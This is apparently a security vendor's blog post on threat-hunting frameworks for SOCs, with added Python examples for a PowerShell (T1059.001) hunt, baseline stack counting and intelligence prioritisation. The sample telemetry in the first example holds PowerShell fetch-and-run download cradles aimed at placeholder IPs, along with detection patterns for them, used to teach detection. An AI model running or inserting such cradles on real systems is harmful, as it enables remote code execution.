Threat Hunting: Building Threat-Informed Defence in Your SOC

August 17, 2025
Learn about the major frameworks you can use for threat hunting, and how it can benefit your SOC.

by Kade Morton (CEO)
Introduction

Proactive threat hunting validates defences against evolving adversaries

Threat hunting has become one of the most important activities in modern security operations.

In an age where adversaries innovate constantly, waiting for alerts is not enough. A mature SOC must be proactive, searching for adversaries before they trigger alarms, and validating whether defences truly work against real-world tactics.

Threat-informed defence is the philosophy that underpins this approach. Instead of hunting based on hunches or generic indicators, teams use structured frameworks that tie hunts to adversary behaviour. This blog explores why threat hunting matters, the major frameworks you can adopt, what makes a hunt successful, and common pitfalls to avoid.

Why Threat Hunting Matters
  • Attackers Move Faster than Defenders: Threat actors exploit gaps in visibility, misconfigurations, and novel tactics, techniques and procedures (TTPs). By the time an alert fires, damage may already be done. Hunting helps you catch these subtle intrusions earlier.
  • Detection Gaps Are Inevitable: No matter how advanced your tools, there will be blind spots. Threat hunting exposes those gaps and feeds improvements back into detection engineering.
  • SOC Maturity and Analyst Skill Growth: Hunting develops analyst expertise, strengthens defensive posture, and transitions the SOC from reactive firefighting to proactive security.
The Main Threat Hunting Frameworks

Different organisations have proposed structured methodologies for threat hunting. Here are the most prominent:

MITRE ATT&CK®-Driven Hunting

The MITRE ATT&CK® framework is one of the most widely adopted tools for structuring threat hunts. Rather than starting from scratch, analysts can anchor their hunts in a globally recognised catalogue of adversary tactics and techniques. ATT&CK doesn’t just tell you what attackers do; each technique entry also lists the data sources, detections and mitigations that apply, which gives you a roadmap for how to detect it.

A typical ATT&CK-driven hunting process follows these steps:

  • Select Relevant Tactics and Techniques: Start by choosing ATT&CK techniques based on your threat model, recent intelligence, or adversary profiles. For example, if your organisation is targeted by ransomware actors, you might focus on techniques in the Execution and Impact tactics.
  • Form a Hypothesis: Translate the chosen technique into a hypothesis. For instance: “An adversary may be using PowerShell (T1059.001) for initial execution in our environment.”
  • Map to Available Data Sources: Use the data sources listed on the technique page to determine what telemetry you’ll need. For PowerShell execution (T1059.001), ATT&CK lists Process: Process Creation, Command: Command Execution, Script: Script Execution and Module: Module Load, which in practice means process creation logs (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing), PowerShell script block and module logging (Event IDs 4103/4104), or equivalent endpoint telemetry.
  • Hunt in the Environment: Build queries or detections in your SIEM/EDR to test the hypothesis. Look for activity matching the ATT&CK technique, such as unusual PowerShell command lines.
  • Investigate and Enrich: If suspicious activity is found, enrich it with context: when did it occur, which accounts were involved, is it tied to known adversary campaigns?
  • Operationalise Findings: Feed validated findings back into your detection engineering process, for example, creating a new SIEM rule, EDR detection, or SOAR playbook mapped directly to the ATT&CK technique.
  • Measure Coverage: Document which ATT&CK techniques are now covered, identify remaining gaps, and plan the next hunt. Over time, this builds a measurable “ATT&CK coverage map” of your environment.
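The steps above, carried through end to end as an added example that is not part of the original post: the hypothesis is “an adversary is using PowerShell (T1059.001) for execution”, the data source is process-creation telemetry, and the hunt scores each PowerShell launch for the behaviours a hunter looks for (encoded commands, hidden windows, execution-policy bypass, download cradles, and Office or script-host parents) before recording the result against the technique for the coverage map. All hosts, users, command lines and IP addresses are constructed, and the indicator weights are an assumption for this example, not an ATT&CK score.

```python
"""Hypothesis-driven hunt for ATT&CK T1059.001 over constructed process-creation events.
Added example; every event below is invented."""
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parents that rarely have a legitimate reason to spawn PowerShell (assumption for this example).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}

# (name, pattern, weight); weights are illustrative, not an ATT&CK score.
INDICATORS = [
    ("encoded command", re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s"), 2),
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    ("execution policy bypass", re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"), 1),
    ("download cradle", re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
        r"net\.webclient|invoke-expression|\biex\b"), 3),
]
# Captures the base64 payload following -e/-enc/-EncodedCommand.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument the way attacker tooling does (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed telemetry, loosely shaped like Sysmon Event ID 1 fields.
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-ChildItem C:\\Users"},
    {"host": "ws02", "user": "bob", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "srv05", "user": "svc_backup", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "ws03", "user": "carol", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": 'powershell -ep bypass -c "iwr http://203.0.113.9/x.ps1 | iex"'},
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def score_event(ev):
    """Score one PowerShell launch; indicators are matched against the raw and the decoded command line."""
    decoded = decode_encoded_command(ev["cmdline"])
    text = ev["cmdline"] if decoded is None else ev["cmdline"] + " " + decoded
    score, reasons = 0, []
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            reasons.append(name)
    if ev["parent"].lower() in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"spawned by {ev['parent']}")
    return score, reasons, decoded


def hunt_t1059_001(events, threshold=3):
    """Run the hypothesis over the telemetry and return findings at or above the threshold, highest first."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in POWERSHELL_IMAGES:
            continue
        score, reasons, decoded = score_event(ev)
        if score >= threshold:
            findings.append({**ev, "score": score, "reasons": reasons, "decoded": decoded})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


def hunt_summary(findings, events):
    """The record that feeds the ATT&CK coverage map: technique, data sources used, what was reviewed."""
    return {
        "technique": "T1059.001",
        "data_sources": ["Process: Process Creation", "Command: Command Execution"],
        "events_reviewed": sum(1 for e in events if e["image"].lower() in POWERSHELL_IMAGES),
        "findings": len(findings),
        "hosts": sorted({f["host"] for f in findings}),
    }


if __name__ == "__main__":
    hits = hunt_t1059_001(EVENTS)
    for f in hits:
        print(f"{f['host']} {f['user']} score={f['score']} {f['reasons']}")
    print(hunt_summary(hits, EVENTS))
```

In a real hunt the same logic is expressed as a SIEM or EDR query over weeks of data; the point of the scoring is that no single flag is conclusive (backup scripts legitimately use `-File`, administrators use `-NoProfile`), so the hunt combines behaviours and inspects the decoded payload rather than matching one string.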

SANS Threat Hunting Process (The Hunting Loop)

The Threat Hunting Loop, originally published by Sqrrl as a four-stage cycle (create hypotheses; investigate via tools and techniques; uncover new patterns and TTPs; inform and enrich analytics) and since taught widely, including in SANS material, provides a structured, repeatable process for hunts. It is intelligence-driven, but with defined stages that make it more than just using threat intel. In the expanded form used here, the loop consists of:

  • Hypothesis Generation: Starting with a question based on threat intelligence or observed activity.
  • Profiling the Environment: Establishing baselines of normal behaviour to spot anomalies.
  • Hunting: Actively testing the hypothesis by querying available data sources.
  • Discovery and Enrichment: Investigating findings, correlating with other data, and gathering context.
  • Operationalisation: Feeding discoveries back into detections, dashboards, or playbooks to strengthen defences.

This cyclical process ensures hunts not only identify potential threats but also continuously improve detection capabilities.
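The “Profiling the Environment” stage is the one hunters most often skip, so here is an added example (not from the original post) of the simplest form of it: stack counting. A baseline of which parent processes launch which child processes is built from a window of historical telemetry, and today’s events are then flagged when their parent-to-child pair was never seen or was seen on only a handful of hosts. All hostnames, process pairs and the 20-host fleet are constructed.

```python
"""Profiling the environment by stack counting parent->child process pairs.
Added example with constructed telemetry; hosts and events are invented."""
from collections import Counter, defaultdict


def pair_key(ev):
    """Normalise a parent->child pair so case differences do not split the baseline."""
    return (ev["parent"].lower(), ev["image"].lower())


def build_baseline(events):
    """Count each pair and record the distinct hosts it appeared on during the baseline window."""
    counts = Counter()
    hosts = defaultdict(set)
    for ev in events:
        k = pair_key(ev)
        counts[k] += 1
        hosts[k].add(ev["host"])
    return {"counts": counts, "hosts": hosts, "fleet": {e["host"] for e in events}}


def find_anomalies(baseline, new_events, rare_host_limit=2):
    """Flag pairs never seen in the baseline, or seen on at most `rare_host_limit` hosts."""
    findings = []
    for ev in new_events:
        seen_on = len(baseline["hosts"].get(pair_key(ev), ()))
        if seen_on == 0:
            findings.append({**ev, "reason": "never seen in baseline"})
        elif seen_on <= rare_host_limit:
            findings.append({**ev, "reason": f"rare: seen on {seen_on} of {len(baseline['fleet'])} hosts"})
    return findings


# Constructed 30-day baseline: 20 workstations doing ordinary things.
BASELINE_EVENTS = []
for _i in range(1, 21):
    _host = f"ws{_i:02d}"
    BASELINE_EVENTS += [
        {"host": _host, "parent": "explorer.exe", "image": "powershell.exe"},
        {"host": _host, "parent": "services.exe", "image": "svchost.exe"},
        {"host": _host, "parent": "explorer.exe", "image": "outlook.exe"},
    ]
# One administrator ran certutil from a shell on a single host during the baseline window.
BASELINE_EVENTS.append({"host": "ws19", "parent": "cmd.exe", "image": "certutil.exe"})

# Constructed events from today that the hunter tests against the baseline.
TODAY_EVENTS = [
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe"},  # common, expected
    {"host": "ws07", "parent": "winword.exe", "image": "powershell.exe"},   # never seen before
    {"host": "ws12", "parent": "cmd.exe", "image": "certutil.exe"},         # rare in the fleet
    {"host": "ws05", "parent": "services.exe", "image": "svchost.exe"},     # common, expected
]

if __name__ == "__main__":
    base = build_baseline(BASELINE_EVENTS)
    for f in find_anomalies(base, TODAY_EVENTS):
        print(f"{f['host']}: {f['parent']} -> {f['image']} ({f['reason']})")
```

The same approach works for any field you can group on (user-to-host logons, service names, scheduled task names, outbound destinations); what changes between environments is only the baseline window and the rarity threshold, both of which the hunt should document so the next iteration can reuse them.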

Hunting Maturity Model (HMM)

The Hunting Maturity Model (HMM) was developed by David Bianco while at Sqrrl; Sqrrl was acquired by Amazon in 2018. HMM rates an organisation on how much of its analysis is driven by automated alerting versus analyst-created procedures, how rich its routine data collection is, and whether successful hunts are automated. It defines five levels:

  • HM0 Initial: relies primarily on automated alerting; little or no routine data collection; no real hunting.
  • HM1 Minimal: incorporates threat intelligence indicator searches; moderate to high data collection.
  • HM2 Procedural: follows hunting procedures created by others; high data collection.
  • HM3 Innovative: creates new hunting procedures and analytics; high data collection.
  • HM4 Leading: automates the majority of successful hunting procedures so analysts can focus on new hunts; high data collection.

This model remains a widely used way for SOCs to benchmark where they are on their hunting journey and chart a path toward maturity.

Analytic Frameworks for Guiding Hunts (Diamond Model and Kill Chain)

  • Diamond Model for Intrusion Analysis: Describes every intrusion event with four core features (adversary, capability, infrastructure, and victim) and the relationships between them. Analysts can pivot across these features, for example from a piece of infrastructure to every capability and victim associated with it, to generate hypotheses and better understand adversary behaviour.
  • Cyber Kill Chain® (Lockheed Martin): Breaks down an adversary attack into seven phases: reconnaissance, weaponisation, delivery, exploitation, installation, command and control, and actions on objectives. It helps hunters frame their work by asking: “At which phase are we most likely to detect this activity in our environment?”

While not frameworks for TTPs in the same sense as MITRE ATT&CK, both models give analysts useful structures to guide hunts and anticipate adversary behaviour.

TaHiTI Methodology

TaHiTI (Targeted Hunting integrating Threat Intelligence) is a freely published methodology developed in 2018 by the Dutch financial sector. It is hypothesis-driven, uses threat intelligence as the main source of hunt triggers, maps hunts to MITRE ATT&CK, and organises work as a backlog of short “hunt abstracts”. The process runs in three phases:

  • Initiate: a trigger (intelligence, an incident, a red team finding, or a gap in a coverage map) is turned into a hunt abstract and stored in the hunt backlog.
  • Hunt: the abstract is refined into a concrete hypothesis with scope and data sources, then executed.
  • Finalise: findings are documented and handed over to incident response, detection engineering, or intelligence as appropriate, and the backlog is updated.

Although less widely adopted than ATT&CK-driven hunting or the Hunting Loop, it suits teams that want short cycles of hypothesis and testing, rapid feedback into detections, and a lightweight process they can track in a backlog rather than a heavyweight programme.

What Makes Threat Hunting Successful
  • Clear Hypotheses: Hunts should start with a focused, testable question (e.g., “Are adversaries using living-off-the-land binaries to move laterally in our network?”).
  • Threat Intelligence Integration: Quality cyber threat intelligence provides the seed for relevant hunts and ensures defenders are testing against real-world TTPs.
  • Data Coverage and Visibility: Hunts are only as strong as the telemetry available; endpoint, network, cloud, and identity data must be ingested and searchable.
  • Repeatability and Documentation: Each hunt should produce lessons learned, new detections, and playbooks for future use.
  • Feedback Loop to Detection Engineering: Findings from hunts must feed directly into SIEM/SOAR detections, improving resilience over time.
Common Pitfalls to Avoid
  • Unstructured “Fishing Expeditions”: Hunting without hypotheses wastes time and erodes analyst confidence.
  • Over-Reliance on Tools Alone: Technology supports hunting, but analyst curiosity and critical thinking are irreplaceable.
  • Failure to Operationalise Results: If hunts don’t improve detection coverage or incident response, they’re wasted effort.
  • Not Measuring Value: Without metrics, such as detection coverage improvements, dwell time reduction, or successful hypothesis validation, executive buy-in may fade.
  • Burnout and Scope Creep: Analysts tasked with constant ad hoc hunts without a process risk fatigue and inconsistent outcomes.
Bringing It All Together: Threat-Informed Defence

Threat-informed defence is the practice of grounding your security operations in a clear understanding of how adversaries actually operate. Instead of building defences around generic risks or vendor-driven priorities, you align security controls, detection engineering, and response playbooks to real-world adversary TTPs.

In this model, frameworks like MITRE ATT&CK, the Diamond Model, and the Hunting Loop aren’t academic exercises; they are the scaffolding that keeps your defence program anchored to reality.

Where threat hunting fits:

  • Threat hunting becomes the validation engine for threat-informed defence.
  • By testing hypotheses against adversary TTPs, hunts reveal whether your environment can detect and withstand those behaviours.
  • Every hunt produces lessons learned: gaps in telemetry, missing detections, or untested assumptions. Those lessons feed back into detection engineering and defensive controls.
  • Over time, this cycle ensures your defences are not just theoretical but battle-tested against the threats that matter most to you.

Put simply: threat-informed defence sets the strategy, and threat hunting executes it in practice. The result is a SOC that no longer waits for attackers to announce themselves but continuously checks whether its defences stand up to the adversaries most likely to come knocking.

The Role of Cyber Threat Intelligence in Threat Hunting

Threat hunting is only as strong as the intelligence it’s built on. Too often, “threat intelligence” is treated as a feed of indicators of compromise (IOCs): IP addresses, file hashes, or domain names. While IOCs can support detection, they cannot drive threat hunting. By the time an IOC is distributed, it may already be obsolete, burned, or irrelevant to your environment. Hunting based on these alone quickly becomes a game of whack-a-mole.

Real threat hunting requires intelligence that answers bigger questions:

  • Which threat actors are likely to target my industry and geography? Understanding the adversaries most relevant to your organisation ensures you’re not chasing ghosts, but focusing on real risks.
  • Which techniques do those adversaries use? Mapping adversary behaviour to frameworks like MITRE ATT&CK highlights where you should focus your hunts and what data you’ll need.
  • When were those techniques and campaigns active? Bounding intelligence in timeframes matters. Techniques used three years ago may not be relevant today, while emerging campaigns might demand immediate hunts.

Good intelligence informs what to hunt, when to hunt it, and why it matters. This elevates hunting from ad hoc curiosity to a strategic capability.
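As an added example, not part of the original post, this is what “bounded in time” looks like when intelligence is turned into a hunt backlog: reports are kept only if the actor targets your industry and region and was active inside the window you care about, and the techniques of the remaining actors are ranked by how many relevant actors use them, most recently seen first. Every actor, report and date is constructed; the industry and region labels and the one-year default window are assumptions for this example.

```python
"""Prioritising hunts from time-bounded threat intelligence.
Added example; actors, reports and dates are constructed."""
from collections import defaultdict
from datetime import date, timedelta

# Constructed intelligence records: who targets what, with what, and when they were last seen.
INTEL = [
    {"actor": "Actor A", "industries": {"finance"}, "regions": {"EU"},
     "techniques": {"T1566.001", "T1059.001", "T1486"}, "last_seen": date(2025, 7, 20)},
    {"actor": "Actor B", "industries": {"finance", "healthcare"}, "regions": {"EU", "NA"},
     "techniques": {"T1566.001", "T1078"}, "last_seen": date(2025, 6, 2)},
    {"actor": "Actor C", "industries": {"energy"}, "regions": {"EU"},
     "techniques": {"T1190"}, "last_seen": date(2025, 8, 1)},      # wrong industry
    {"actor": "Actor D", "industries": {"finance"}, "regions": {"EU"},
     "techniques": {"T1059.001", "T1047"}, "last_seen": date(2022, 3, 10)},  # stale
    {"actor": "Actor E", "industries": {"finance"}, "regions": {"APAC"},
     "techniques": {"T1566.001"}, "last_seen": date(2025, 8, 5)},  # wrong region
]


def relevant_reports(reports, industry, region, as_of, window_days=365):
    """Keep reports on actors that target this industry and region and were active inside the window."""
    cutoff = as_of - timedelta(days=window_days)
    return [r for r in reports
            if industry in r["industries"] and region in r["regions"]
            and cutoff <= r["last_seen"] <= as_of]


def prioritise_techniques(reports, industry, region, as_of, window_days=365):
    """Rank techniques by number of relevant actors, then by most recent sighting, then by ID."""
    actors = defaultdict(set)
    latest = {}
    for r in relevant_reports(reports, industry, region, as_of, window_days):
        for t in r["techniques"]:
            actors[t].add(r["actor"])
            latest[t] = max(latest.get(t, date.min), r["last_seen"])
    ranked = sorted(actors, key=lambda t: (-len(actors[t]), -latest[t].toordinal(), t))
    return [{"technique": t, "actors": sorted(actors[t]), "last_seen": latest[t]} for t in ranked]


if __name__ == "__main__":
    for row in prioritise_techniques(INTEL, "finance", "EU", date(2025, 8, 17)):
        print(f"{row['technique']:<10} actors={row['actors']} last_seen={row['last_seen']}")
```

The output is the hunt backlog in priority order: the top technique is the one most of your relevant adversaries share, and a technique used only by an actor that has been dormant for years drops out unless you deliberately widen the window.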

Arachne Digital provides intelligence that goes beyond static indicators. Our threat intelligence highlights the adversaries most likely to target you, the techniques they employ, and the industries and regions they focus on, all bounded in time. This is the type of intelligence that fuels proactive hunts, closes detection gaps, and enables threat-informed defence.

Reach out to us for more details.

Final Thoughts

Threat hunting is one of the clearest signs of SOC maturity. It demands curiosity, structure, and a willingness to learn from both successes and failures. Whether you start with ATT&CK, intelligence-driven hunts, or a maturity model, the key is to build a repeatable process that grows with your organisation.

These insights are not abstract theory; they’re the foundation of how modern defenders close detection gaps, validate assumptions, and build resilience against today’s adversaries.

© 2026 Arachne Digital, ALL RIGHTS RESERVED